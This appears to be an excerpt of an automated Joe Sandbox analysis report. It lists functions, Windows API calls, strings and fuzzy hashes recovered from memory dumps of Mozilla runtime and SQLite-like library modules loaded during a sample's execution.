Part of subcall function 6D565B50: GetTickCount64.KERNEL32 ref: 6D565BE4

GetCurrentThreadId.KERNEL32 ref: 6D555EAB
GetCurrentThreadId.KERNEL32 ref: 6D555EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D555ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6D556017

Part of subcall function 6D544310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6D5442D2), ref: 6D544387

GetCurrentProcess.KERNEL32 ref: 6D555F53
GetCurrentThread.KERNEL32 ref: 6D555F5C
GetCurrentProcess.KERNEL32 ref: 6D555F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6D555F7E

Strings

GeckoMain, xrefs: 6D555ECE, 6D556015

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Current$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeavePerformanceQueryTickstrlen
String ID: GeckoMain
API String ID: 1510483484-966795396
Opcode ID: fcbdabd49f783d7a7754fd2d66b1e2a936361477298ceee3be5d70be162aa6df
Instruction ID: c3e8137321801f3285daf0831e2861a661a7ea830ed4e4203edf75d561fff9a6
Opcode Fuzzy Hash: fcbdabd49f783d7a7754fd2d66b1e2a936361477298ceee3be5d70be162aa6df
Instruction Fuzzy Hash: 8A71D2B05087809FDB19DF28C480A2ABBF0FF9A304F45496EE58687F52D731E854CB92

Function 6D557FD0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6D558007
memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6D55802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6D55803D
memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6D55809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D5580B9
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5580ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5580FB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6D55817C

Strings

0>Xm, xrefs: 6D55811E

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memset$EnumModulesProcess$ErrorFileLastModuleNamewcscpy_s
String ID: 0>Xm
API String ID: 3924665729-3204130206
Opcode ID: 86178ba8b7105b9c790d017ac00797251d044c508f8490e4f33e7b6d314eafa0
Instruction ID: fc932ff8561542f996bbd4a518021ab91f80fc6018ee8b4980c81910d632b939
Opcode Fuzzy Hash: 86178ba8b7105b9c790d017ac00797251d044c508f8490e4f33e7b6d314eafa0
Instruction Fuzzy Hash: A751C4B1D00204ABDF05DFA9DC84ABFBBB9EF89224F150525E915E7741E7309D10CBA2

Function 6D559620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6D559675
__Init_thread_footer.LIBCMT ref: 6D559697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6D5596E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6D559707
__Init_thread_footer.LIBCMT ref: 6D55971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6D559773

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6D5597B7
FreeLibrary.KERNEL32 ref: 6D5597D0
FreeLibrary.KERNEL32 ref: 6D5597EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6D559824

Strings

NtMapViewOfSection, xrefs: 6D559701
ntdll.dll, xrefs: 6D5596E3
MapViewOfFileNuma2, xrefs: 6D5597B1
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6D559670

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 8b2fa543e1d0391f0c4f3cceddd5c2523f61589c76c609e405788e85b02a3145
Instruction ID: 9b90ab19c523bdb19f9a55be74b31c44939e3190589b2695aaeeef2c9826605d
Opcode Fuzzy Hash: 8b2fa543e1d0391f0c4f3cceddd5c2523f61589c76c609e405788e85b02a3145
Instruction Fuzzy Hash: 2741D6B56006069BDF08DF64D884FA677F4EB4A750F12852EED1A97B40DB34E814CFA1

Function 6D58EC70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58EC8C

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

GetCurrentThreadId.KERNEL32 ref: 6D58ECA1
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58ECAE
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6D58ED19
CloseHandle.KERNEL32(?), ref: 6D58ED28
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6D58EC94

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_ensure_started
API String ID: 3692313954-125001283
Opcode ID: 40bf4d88212281c0358a8a7b65f9f6684d0d76b5577819d89e4503b63bff2b28
Instruction ID: 806841621ce5f444cb06e3ff31d7fc87e6b32114813d8c4d6c901c3d3a91c52d
Opcode Fuzzy Hash: 40bf4d88212281c0358a8a7b65f9f6684d0d76b5577819d89e4503b63bff2b28
Instruction Fuzzy Hash: 54212771400924AFDF04AF64D844B7A3779FB86369F024219FD1897A43DB369C05CBA2

Function 61E44905 Relevance: 13.8, APIs: 6, Strings: 3, Instructions: 346COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E44953
memcmp.MSVCRT ref: 61E44A05
memcmp.MSVCRT ref: 61E44BC9
memcmp.MSVCRT ref: 61E44C16
memcmp.MSVCRT ref: 61E44C7A
memcmp.MSVCRT ref: 61E44CAE

Strings

cache, xrefs: 61E44CA7, 61E44CC5
@, xrefs: 61E44922
access, xrefs: 61E44BE0

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: @$access$cache
API String ID: 1475443563-1361544076
Opcode ID: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
Instruction ID: bf7f6bc55254c54d21197c9aa673ce015ae0bdc4e4658c964804263f7089fac0
Opcode Fuzzy Hash: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
Instruction Fuzzy Hash: FDD16FB4A083558FEB11CFA4D48039EBBF1AF89318F28C45ED895AB341E339D841DB55

Function 6D553E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6D553EEE
RtlFreeHeap.NTDLL ref: 6D553FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6D554006
RtlFreeHeap.NTDLL ref: 6D5540A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6D553CCC), ref: 6D5540AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6D553CCC), ref: 6D5540C2
RtlFreeHeap.NTDLL ref: 6D554134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6D553CCC), ref: 6D554143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6D553CCC), ref: 6D554157

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: fd8ea4edb1046602546dd0a1e43bd4909d95e077a63549be8d332f0de4eaf1ae
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 98A191B5A00206CFEB49CF68C880669B7F5FF48304F25459AD909AF752D771E862CFA0

Function 6D542030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6D563F47,?,?,?,6D563F47,6D561A70,?), ref: 6D54207F
memset.VCRUNTIME140(?,000000E5,6D563F47,?,6D563F47,6D561A70,?), ref: 6D5420DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6D563F47,6D561A70,?), ref: 6D54211A
EnterCriticalSection.KERNEL32(6D5CE744,?,6D563F47,6D561A70,?), ref: 6D542145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6D563F47,6D561A70,?), ref: 6D5421BA
EnterCriticalSection.KERNEL32(6D5CE744,?,6D563F47,6D561A70,?), ref: 6D5421E0
LeaveCriticalSection.KERNEL32(6D5CE744,?,6D563F47,6D561A70,?), ref: 6D542232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6D542253, 6D542268
MOZ_CRASH(), xrefs: 6D54227D

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 1de8f469ec6390455dca41e795b0d7c38bfebe4ae5dc09c3b3392928ac6f1eeb
Instruction ID: 1b7c8ea0ea146901e0c474c942f3a0b0fbb45f62b3613bb9c6ec3e4a2e9084ca
Opcode Fuzzy Hash: 1de8f469ec6390455dca41e795b0d7c38bfebe4ae5dc09c3b3392928ac6f1eeb
Instruction Fuzzy Hash: 9561B231F046268FCF2CCAA8C885B7E76B5AF95314F568539E624E7A85D7709C00CB82

Function 61E241D7 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E24268

Strings

Xya, xrefs: 61E24418
program, xrefs: 61E24457
NULL, xrefs: 61E243A4
ya, xrefs: 61E2427F
bua, xrefs: 61E24252
(blob), xrefs: 61E2439F
ya, xrefs: 61E2429A
bua, xrefs: 61E24274

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: strcmp
String ID: ya$ya$(blob)$NULL$Xya$bua$bua$program
API String ID: 1004003707-2454903709
Opcode ID: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
Instruction ID: 4befd86826370bfd8630e1afa8d422750160e2b9b2ea18a9ced5634f5bcee847
Opcode Fuzzy Hash: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
Instruction Fuzzy Hash: 3B7115B49097469FC708CF58C191A59BBF0BF8A304F25C85EE8A89B751D335D882CF92

Function 6D5A5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5DC9
std::_Facet_Register.LIBCPMT ref: 6D5A5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6D5A5C8C,?,6D57E829), ref: 6D5A5E45

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 1ccd2d4cbe90e04940d5d6ad4223786768e0802d165a6a4de2f85bbe0e45eb98
Instruction ID: 3134497fa0a016b5cfab56d482cceb58a9f67128490383456fd3ada44fcf0a54
Opcode Fuzzy Hash: 1ccd2d4cbe90e04940d5d6ad4223786768e0802d165a6a4de2f85bbe0e45eb98
Instruction Fuzzy Hash: 92417F706002159FCF04EF64C898FBE77B5EF89314F4A4469E6069BB81EB309D05CB61

Function 6D57CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6D5431A7), ref: 6D57CDDD

Strings

<jemalloc>, xrefs: 6D57CF9F, 6D57CFB3
: (malloc) Error in VirtualFree(), xrefs: 6D57CFA4, 6D57CFB8

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 3c95183876f9a95e6b3fbc1b552f72216942f88499d781b8491eb188f943de2a
Instruction ID: 38ac59dc3c53687266477a773a5e4fa635120d376b9ee69c5ad8a3ca6d95c5f0
Opcode Fuzzy Hash: 3c95183876f9a95e6b3fbc1b552f72216942f88499d781b8491eb188f943de2a
Instruction Fuzzy Hash: E731B4307442165BEF299BA98C45F7E7BB9BF41710F314419FA11EBA80DB70D540CBA2

Function 6D5431C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 183libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6D543217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6D543236
FreeLibrary.KERNEL32 ref: 6D54324B
__Init_thread_footer.LIBCMT ref: 6D543260
__aulldiv.LIBCMT ref: 6D54346B

Strings

QueryInterruptTime, xrefs: 6D543230
KernelBase.dll, xrefs: 6D543212

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc__aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 715094258-2417823192
Opcode ID: 0b5c3da7f493197f7ce84d6ebdca7e9e94787b89f2ec33d67efa199decf097af
Instruction ID: d515d0b13baf8e2fffbc8d125e6a3497565933d88715d9d5b76ea933c80ae64b
Opcode Fuzzy Hash: 0b5c3da7f493197f7ce84d6ebdca7e9e94787b89f2ec33d67efa199decf097af
Instruction Fuzzy Hash: 27613731908B418BDB15CF34C45575AB3F4FFC6394F228B1DE8A5A3AA1DB309545C742

Function 6D56C769 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6D56C784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6D56C801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6D56C83D

Strings

inf, xrefs: 6D56C78F
INF, xrefs: 6D56C794
NAN, xrefs: 6D56C7AD
nan, xrefs: 6D56C7A8

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: _dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 2690437184-4166689840
Opcode ID: 5407f691ffd3152b81c3c2a8ee5937303abe572fe736db203fd4602ce935c252
Instruction ID: ec08b53252faf48f3f27011de1361147f4c41690143eb84230f889dfd4b17721
Opcode Fuzzy Hash: 5407f691ffd3152b81c3c2a8ee5937303abe572fe736db203fd4602ce935c252
Instruction Fuzzy Hash: 98517F709087818BDB19DF6CC4816AAFBF0BF8A304F018D2DE9D5A7661E770D9858B53

Function 61EAFA90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 61EAFABB
vfprintf.MSVCRT ref: 61EAFAD7
abort.MSVCRT ref: 61EAFADC
VirtualQuery.KERNEL32 ref: 61EAFB80
VirtualProtect.KERNEL32 ref: 61EAFBC2

Strings

@, xrefs: 61EAFBAB

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: Virtual$ProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1503958624-2766056989
Opcode ID: c2659c9de0e6f83528643800fc17f210c5c049cf07d0f7c16b155af3332bfc43
Instruction ID: e02739713456e9e2b4b58c9f61bb7aa4e21306e92e7ace3c3799b12748f41957
Opcode Fuzzy Hash: c2659c9de0e6f83528643800fc17f210c5c049cf07d0f7c16b155af3332bfc43
Instruction Fuzzy Hash: 9A412AB1A547029FD700DF68D58464ABBF0FB89758F64C92DE8A98B340E734E884CB52

Function 6D589420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
